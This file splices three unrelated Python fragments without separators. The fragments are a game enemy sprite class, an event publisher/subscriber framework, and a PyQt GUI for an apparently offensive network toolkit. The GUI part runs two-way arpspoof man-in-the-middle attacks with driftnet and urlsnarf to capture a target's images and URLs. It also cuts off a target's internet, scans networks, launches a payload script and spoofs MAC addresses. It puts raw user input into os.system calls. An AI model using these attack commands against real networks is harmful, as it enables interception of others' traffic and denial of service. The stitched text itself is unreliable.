def __init__(self, sprite_root):
super().__init__()
self.character_face_direction = LEFT_FACING
self.movement_speed = 10
self.health = 100
self.is_idle = False
self.is_hit = False
self.is_attacking = False
self.cur_idle_texture = 0
self.cur_attack_texture = 0
self.cur_run_texture = 0
self.cur_hit_texture = 0
self.cur_death_texture = 0
self.center_x, self.center_y = random.randint(300, 350), random.randint(450, 500)
self.path = []
self.path_position = 1
self.right_facing_textures = [
arcade.load_spritesheet(
path['img'] / sprite_root / f'{i}.png',
PIL.Image.open(
path['img'] / sprite_root / f'{i}.png').size[0]/j,
PIL.Image.open(
path['img'] / sprite_root / f'{i}.png').size[1],
j, j)
for (i, j) in zip(
('attack', 'death', 'hurt', 'idle', 'walk'),
(20, 13, 16, 18, 20))
]
self.left_facing_textures = []
for animation in self.right_facing_textures:
textures_list = []
for texture in animation:
textures_list.append(
arcade.Texture(
f'{texture.name}_mirrored',
PIL.ImageOps.mirror(texture.image)
))
self.left_facing_textures.append(textures_list)
self.texture_dict = {}
for (i, j) in zip(
('attack', 'death', 'hurt', 'idle', 'walk'),
(0, 1, 2, 3, 4)
):
self.texture_dict[i] = [
self.right_facing_textures[j], self.left_facing_textures[j]
]
self.texture = self.left_facing_textures[0][0]
self.target = (self.center_x, self.center_y)
def enemy_pathfinding(self, matrix, target, delta_time):
if len(self.path)-1 < self.path_position:
self.path_position = 1
self.path = pathfinding.find_path(
matrix,
self.center_x, self.center_y,
target.center_x, target.center_y,
16, 36
)
# print(self.path, self.path_position)
if len(self.path) > 2:
path_x, path_y = self.path[self.path_position]
if (
int(self.center_x) not in range(
path_x-2, path_x+2)and
int(self.center_y) not in range(
path_y-2, path_y+2)
):
# print(f"Moving to node {self.path_position}")
self.target = self.path[self.path_position]
else:
# print(f"At node {self.path_position}")
self.path_position += 1
else:
self.change_x, self.change_y = 0, 0
# self.character_face_direction = target.character_face_direction
self.path = pathfinding.find_path(
matrix,
self.center_x, self.center_y,
target.center_x, target.center_y,
16, 36
)
self.path_position = 1
def move_to(self, delta_time):
# target = (x, y)
dx = self.target[0] - self.center_x
dy = self.target[1] - self.center_y
magnitude = sqrt(dx**2 + dy**2)+0.00001
self.change_y = dy/magnitude*10
self.change_x = dx/magnitude*10
# print(f"""MOVING:{dy, dx, self.angle, self.change_x, self.change_y}
# \n{self.path_position, self.path}""")
def on_update(self, delta_time):
self.move_to(delta_time)
self.update_animation(delta_time)
self.center_x += self.change_x*delta_time*self.movement_speed
self.center_y += self.change_y*delta_time*self.movement_speed
self.change_x = 0
self.change_y = 0
def update_animation(self, delta_time):
# Figure out if we need to flip face left or right
if self.change_x < 0 and self.character_face_direction == RIGHT_FACING:
self.character_face_direction = LEFT_FACING
elif (
self.change_x > 0 and
self.character_face_direction == LEFT_FACING
| |
#!/usr/bin/env python
"""Events framework with publisher, subscriber and repository."""
__author__ = '<NAME> <<EMAIL>>, <NAME>'
import functools
import sys
import threading
import traceback
from gevent import event as gevent_event
from pyon.core import bootstrap, MSG_HEADER_ACTOR
from pyon.core.bootstrap import CFG
from pyon.core.exception import BadRequest, IonException, StreamException
from pyon.datastore.datastore import DataStore
from pyon.datastore.datastore_query import QUERY_EXP_KEY, DatastoreQueryBuilder, DQ
from pyon.ion.identifier import create_unique_event_id, create_simple_unique_id
from pyon.net.endpoint import Publisher, Subscriber, BaseEndpoint
from pyon.net.transport import XOTransport, NameTrio
from pyon.util.async import spawn
from pyon.util.containers import get_ion_ts_millis, is_valid_ts
from pyon.util.log import log
from interface.objects import Event
#The event will be ignored if older than this time period
VALID_EVENT_TIME_PERIOD = 365 * 24 * 60 * 60 * 1000 # one year
DEFAULT_SYSTEM_XS = "system"
DEFAULT_EVENTS_XP = "events"
# Alternative way to set process context
event_context = threading.local()
class EventError(IonException):
    """Error raised within the event framework; reported as HTTP 500."""
    status_code = 500
class EventPublisher(Publisher):
    """Publisher of Ion events onto the events exchange point.

    The routing key encodes the event's type hierarchy, sub_type,
    origin_type and origin so subscribers can bind with wildcards.
    """
    @classmethod
    def get_events_exchange_point(cls):
        """Return the fully qualified events XP name, e.g. '<sysname>.system.events'."""
        # match with default output of XOs
        root_xs = CFG.get_safe("exchange.core.system_xs", DEFAULT_SYSTEM_XS)
        events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
        return "%s.%s.%s" % (bootstrap.get_sys_name(), root_xs, events_xp)
    def __init__(self, event_type=None, xp=None, process=None, **kwargs):
        """
        Constructs a publisher of events for a specific type.
        @param event_type The name of the event type object
        @param xp Exchange (AMQP) name, can be none, will use events default.
        """
        self.event_type = event_type
        self.process = process
        self._events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
        # Keep a handle on the container's event repository if one exists.
        if bootstrap.container_instance and getattr(bootstrap.container_instance, 'event_repository', None):
            self.event_repo = bootstrap.container_instance.event_repository
        else:
            self.event_repo = None
        # generate an exchange name to publish events to
        container = (hasattr(self, '_process') and hasattr(self._process, 'container') and self._process.container) or BaseEndpoint._get_container_instance()
        if container and container.has_capability(container.CCAP.EXCHANGE_MANAGER): # might be too early in chain
            xp = xp or container.create_xp(self._events_xp)
            to_name = xp
        else:
            # No exchange manager yet: fall back to a plain (exchange, None) pair.
            xp = xp or self.get_events_exchange_point()
            to_name = (xp, None)
        Publisher.__init__(self, to_name=to_name, **kwargs)
    def _topic(self, event_object):
        """
        Builds the topic (routing key) that this event should be published to:
        '<base types>.<type>.<sub_type>.<origin_type>.<origin>' with '_'
        standing in for empty sub_type/origin_type.
        """
        assert event_object
        base_types = event_object.base_types or []
        base_str = ".".join(reversed(base_types))
        sub_type = event_object.sub_type or "_"
        origin_type = event_object.origin_type or "_"
        routing_key = "%s.%s.%s.%s.%s" % (base_str, event_object._get_type(), sub_type, origin_type, event_object.origin)
        return routing_key
    def publish_event_object(self, event_object):
        """
        Publishes an event of given type for the given origin. Event_type defaults to an
        event_type set when initializing the EventPublisher. Other kwargs fill out the fields
        of the event. This operation will fail with an exception.
        @param event_object the event object to be published
        @retval event_object the event object which was published
        """
        if not event_object:
            raise BadRequest("Must provide event_object")
        event_object.base_types = event_object._get_extends()
        topic = self._topic(event_object)  # Routing key generated using type_, base_types, origin, origin_type, sub_type
        container = (hasattr(self, '_process') and hasattr(self._process, 'container') and self._process.container) or BaseEndpoint._get_container_instance()
        if container and container.has_capability(container.CCAP.EXCHANGE_MANAGER):
            # make sure we are an xp, if not, upgrade
            if not isinstance(self._send_name, XOTransport):
                # Only upgrade the default send name; a custom NameTrio is wrapped as-is.
                default_nt = NameTrio(self.get_events_exchange_point())
                if isinstance(self._send_name, NameTrio) \
                   and self._send_name.exchange == default_nt.exchange \
                   and self._send_name.queue == default_nt.queue \
                   and self._send_name.binding == default_nt.binding:
                    self._send_name = container.create_xp(self._events_xp)
                else:
                    self._send_name = container.create_xp(self._send_name)
            xp = self._send_name
            to_name = xp.create_route(topic)
        else:
            to_name = (self._send_name.exchange, topic)
        current_time = get_ion_ts_millis()
        # Ensure valid created timestamp if supplied
        if event_object.ts_created:
            if not is_valid_ts(event_object.ts_created):
                raise BadRequest("The ts_created value is not a valid timestamp: '%s'" % (event_object.ts_created))
            # Reject events with timestamps too far in the future
            if int(event_object.ts_created) > ( current_time + VALID_EVENT_TIME_PERIOD ):
                raise BadRequest("This ts_created value is too far in the future:'%s'" % (event_object.ts_created))
            # Reject events that are older than specified time
            if int(event_object.ts_created) < (current_time - VALID_EVENT_TIME_PERIOD) :
                raise BadRequest("This ts_created value is too old:'%s'" % (event_object.ts_created))
        else:
            event_object.ts_created = str(current_time)
        # Set the actor id based on the process context (if any)
        if not event_object.actor_id:
            event_object.actor_id = self._get_actor_id()
        #Validate this object - ideally the validator should pass on problems, but for now just log
        #any errors and keep going, since seeing invalid situations are better than skipping validation.
        try:
            event_object._validate()
        except Exception as e:
            log.exception(e)
        #Ensure the event object has a unique id
        if '_id' in event_object:
            raise BadRequest("The event object cannot contain a _id field '%s'" % (event_object))
        #Generate a unique ID for this event
        event_object._id = create_unique_event_id()
        try:
            self.publish(event_object, to_name=to_name)
        except Exception as ex:
            log.exception("Failed to publish event (%s): '%s'" % (ex.message, event_object))
            raise
        return event_object
    def publish_event(self, origin=None, event_type=None, **kwargs):
        """
        Publishes an event of given type for the given origin. Event_type defaults to an
        event_type set when initializing the EventPublisher. Other kwargs fill out the fields
        of the event. This operation will fail with an exception.
        @param origin the origin field value
        @param event_type the event type (defaults to the EventPublisher's event_type if set)
        @param kwargs additional event fields
        @retval event_object the event object which was published
        """
        event_type = event_type or self.event_type
        if not event_type:
            raise BadRequest("No event_type provided")
        event_object = bootstrap.IonObject(event_type, origin=origin, **kwargs)
        ret_val = self.publish_event_object(event_object)
        return ret_val
    def _get_actor_id(self):
        """Returns the current ion-actor-id from incoming process headers"""
        actor_id = ""
        try:
            if self.process:
                ctx = self.process.get_context()
                actor_id = ctx.get(MSG_HEADER_ACTOR, None) or ""
        except Exception as ex:
            # Best-effort: a missing/odd process context just yields "".
            pass
        # Fall back to the thread-local event_context, if set.
        actor_id = actor_id or getattr(event_context, "actor_id", None) or ""
        return actor_id
# Helper for bootstrap purposes: collects queue names created by event
# subscribers in the no-container fallback path (see BaseEventSubscriberMixin).
local_event_queues = []
class BaseEventSubscriberMixin(object):
    """
    Shared subscription-setup logic for event subscribers.

    EventSubscribers come in standard and process-level variants that share
    this code; since both variants already share a base class, multiple
    inheritance is awkward and this mixin is preferred.
    """

    ALL_EVENTS = "#"

    @staticmethod
    def _topic(event_type, origin, sub_type=None, origin_type=None):
        """
        Build the routing-key pattern this subscriber binds to.

        Any component left unspecified falls back to a wildcard, so a missing
        event_type/origin matches anything.
        """
        if event_type == "Event":
            type_part = "Event.#"
        elif event_type:
            type_part = "#.%s.#" % event_type
        else:
            type_part = "#"
        return "%s.%s.%s.%s" % (type_part,
                                sub_type or "*.#",
                                origin_type or "*",
                                origin or "*")

    def __init__(self, xp_name=None, event_type=None, origin=None, queue_name=None,
                 sub_type=None, origin_type=None, pattern=None, auto_delete=None):
        self._events_xp = CFG.get_safe("exchange.core.events", DEFAULT_EVENTS_XP)
        self.event_type = event_type
        self.sub_type = sub_type
        self.origin_type = origin_type
        self.origin = origin

        # Event queues default to auto-delete unless explicitly told otherwise.
        self._auto_delete = True if auto_delete is None else auto_delete

        xp_name = xp_name or self._events_xp
        # An explicit pattern wins over one derived from the event attributes.
        binding = pattern if pattern else self._topic(event_type, origin, sub_type, origin_type)

        # Generate a queue name when none was passed in; prefix it with the
        # process name when we are running inside a process.
        if queue_name is None:
            queue_name = "subsc_" + create_simple_unique_id()
        if hasattr(self, "_process") and self._process:
            queue_name = "%s_%s" % (self._process._proc_name, queue_name)

        # Prefer the process' container; otherwise fall back to the global one.
        container = ((hasattr(self, '_process') and hasattr(self._process, 'container')
                      and self._process.container)
                     or BaseEndpoint._get_container_instance())
        if container:
            xp = container.create_xp(xp_name)
            self._ev_recv_name = container.create_event_xn(queue_name,
                                                           pattern=binding,
                                                           xp=xp,
                                                           auto_delete=self._auto_delete)
            self.binding = None
        else:
            # TODO: remove this fallback -- we should always have a container.
            self.binding = binding
            # Namespace the queue with the sysname: named queues are not
            # namespaced to their exchanges, so two systems on one broker
            # could otherwise cross-pollute messages.
            queue_name = "%s.system.%s" % (bootstrap.get_sys_name(), queue_name)
            # Picked up by inheriting classes.
            self._ev_recv_name = (xp_name, queue_name)

        local_event_queues.append(queue_name)

    def add_event_subscription(self, event_type=None, origin=None, sub_type=None, origin_type=None):
        """ Add another event subscription based on given characteristics. """
        extra_binding = self._topic(event_type, origin, sub_type, origin_type)
        if not isinstance(self._ev_recv_name, XOTransport):
            raise BadRequest("Non XO event subscriber not supported")
        self._ev_recv_name.bind(extra_binding)

    def remove_event_subscription(self, event_type=None, origin=None, sub_type=None, origin_type=None):
        """ Remove an event subscription based on given characteristics. """
        old_binding = self._topic(event_type, origin, sub_type, origin_type)
        if not isinstance(self._ev_recv_name, XOTransport):
            raise BadRequest("Non XO event subscriber not supported")
        self._ev_recv_name.unbind(old_binding)
class EventSubscriber(Subscriber, BaseEventSubscriberMixin):
"""Manages a subscription to an event queue for a select set of event types or
event origins or other specialized binding.
"""
def __init__(self, xp_name=None, event_type=None, origin=None, queue_name=None, callback=None,
sub_type=None, origin_type=None, pattern=None, auto_delete=None, *args, **kwargs):
"""
Initializer.
If the queue_name is specified here, the sysname is prefixed automatically to it. This is because
named queues are not namespaces to their exchanges, so two different systems on the same broker
can cross-pollute messages if a named queue is used.
Note: an EventSubscriber needs to be closed to free broker resources
"""
self._cbthread = None
# sets self._ev_recv_name, self.binding
BaseEventSubscriberMixin.__init__(self, xp_name=xp_name, event_type=event_type, origin=origin,
queue_name=queue_name, sub_type=sub_type, origin_type=origin_type,
pattern=pattern, auto_delete=auto_delete)
log.debug("EventPublisher events pattern %s", self.binding)
from_name = self._get_from_name()
binding = self._get_binding()
Subscriber.__init__(self, from_name=from_name, binding=binding, callback=callback,
auto_delete=self._auto_delete, **kwargs)
def _get_from_name(self):
"""
Returns the from_name that the base Subscriber should listen on.
This is overridden in the process | |
-sP -v {} -oN output.txt".format(self.lineEdit_site.text().lower()))
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("Scan completed successfully")
msg1.exec_()
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Nmap scan could not be started.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def clear(self):
msgbox = QMessageBox(QMessageBox.Question, "Riglsable", "Are you sure you want to clear the results?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
def sniff_image(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
os.system("gnome-terminal --window -x driftnet -i eth0")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Attack initiating,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
def sniff_url(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
os.system("gnome-terminal --window -x urlsnarf -i eth0")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Attack initiating,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
def block_net(self):
if self.lineEdit_router_ip_address.text()=="" and self.lineEdit_target_ip_address.text()=="":
msg9 = QMessageBox()
msg9.setWindowTitle("Information")
msg9.setBaseSize(300,300)
msg9.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg9.setIcon(QMessageBox.Warning)
msg9.setText("Please enter the target IP address and Gateway IP address! !")
msg9.exec_()
elif self.lineEdit_router_ip_address.text()=="":
msg6 = QMessageBox()
msg6.setWindowTitle("Information")
msg6.setBaseSize(300,300)
msg6.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg6.setIcon(QMessageBox.Warning)
msg6.setText("Please enter the Gateway IP address!")
msg6.exec_()
elif self.lineEdit_target_ip_address.text()=="":
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter the target IP address!")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("To stop the attack, close the terminals with ctrl+c .")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Attack initiating,please wait...")
msg.exec_()
os.system("echo 0 > /proc/sys/net/ipv4/ip_forward")
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_router_ip_address.text(),self.lineEdit_target_ip_address.text()))
os.system("gnome-terminal --window -x arpspoof -i eth0 -t {} {} ".format(self.lineEdit_target_ip_address.text(),self.lineEdit_router_ip_address.text()))
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Information)
msg1.setText("IP forwarding: 0")
msg1.exec_()
def free_net(self):
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:red;")
self.plainTextEdit_result.insertPlainText("The target's Internet is unlocked")
os.system("echo 1 > /proc/sys/net/ipv4/ip_forward")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("IP Forwarding: 1")
msg.exec_()
def netdiscover(self):
try:
if(self.lineEdit_router.text()==""):
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter Local Gateway IP address")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Local network scanning,please wait...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Local network scanning,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("gnome-terminal --window -x netdiscover -r {}/16".format(self.lineEdit_router.text()))
self.plainTextEdit_result.clear()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def nmap_network_scanner(self):
try:
if(self.lineEdit_router.text()==""):
msg5 = QMessageBox()
msg5.setWindowTitle("Information")
msg5.setBaseSize(300,300)
msg5.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg5.setIcon(QMessageBox.Warning)
msg5.setText("Please enter Local Gateway IP address")
msg5.exec_()
else:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Nmap local network scanning,please wait...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Nmap local network scanning,please wait...")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("nmap -sn -n -v --open {}/24 -oN output.txt".format(self.lineEdit_router.text()))
file=open("output.txt","r+")
info=file.read()
file.close()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
msg1 = QMessageBox()
msg1.setWindowTitle("Information")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setText("Nmap local network scan completed successfully.")
msg1.setIcon(QMessageBox.Information)
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def payload(self):
try:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Application is starting...")
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Application is started")
msg.setIcon(QMessageBox.Information)
msg.exec_()
os.system("gnome-terminal --window -x python3 payload.py")
self.plainTextEdit_result.clear()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def macchanger_random(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -r {} > output.txt".format(self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setIcon(QMessageBox.Information)
msg.setText("Mac address changed successfully (RANDOM MAC ADDRESS)")
msg.exec_()
self.plainTextEdit_result.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def macchanger_original(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -p {} > output.txt".format(self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setIcon(QMessageBox.Information)
msg.setText("Mac address changed successfully (Original MAC ADDRESS)")
msg.exec_()
self.plainTextEdit_result.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Error,something went wrong.Please Try Again")
msg1.exec_()
def hand_mac(self):
try:
if self.combobox.currentText()=="Interface":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Select Your Interface (eth0 or wlan0)")
msg1.exec_()
elif self.lineEdit_mac.text()=="":
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("Enter the mac address you want to change!!")
msg1.exec_()
else:
msgbox = QMessageBox(QMessageBox.Question, "Mac Address Changer", "If you confirm, your internet will be cut for a few seconds.Are you sure?")
msgbox.addButton(QMessageBox.Yes)
msgbox.addButton(QMessageBox.No)
msgbox.setWindowIcon(QtGui.QIcon('images/icon.png'))
reply = msgbox.exec()
if reply==QMessageBox.Yes:
self.plainTextEdit_result.clear()
self.plainTextEdit_result.setStyleSheet("color:white;")
self.plainTextEdit_result.insertPlainText("Changing mac address,please wait...")
os.system("macchanger -m {} {} > output.txt".format(self.lineEdit_mac.text(),self.combobox.currentText()))
os.system("ifconfig {} down".format(self.combobox.currentText()))
time.sleep(1)
os.system("ifconfig {} up".format(self.combobox.currentText()))
msg = QMessageBox()
msg.setWindowTitle("Information")
msg.setBaseSize(300,300)
msg.setIcon(QMessageBox.Information)
msg.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg.setText("Mac address changed successfully")
msg.exec_()
self.plainTextEdit_result.clear()
self.lineEdit_mac.clear()
with open("output.txt","r+") as file:
info=file.read()
self.plainTextEdit_result.clear()
self.plainTextEdit_result.insertPlainText(info)
elif reply==QMessageBox.No:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
msg1.setText("MAC address has not been changed.")
msg1.exec_()
except:
msg1 = QMessageBox()
msg1.setWindowTitle("Warning")
msg1.setBaseSize(300,300)
msg1.setWindowIcon(QtGui.QIcon('images/icon.png'))
msg1.setIcon(QMessageBox.Critical)
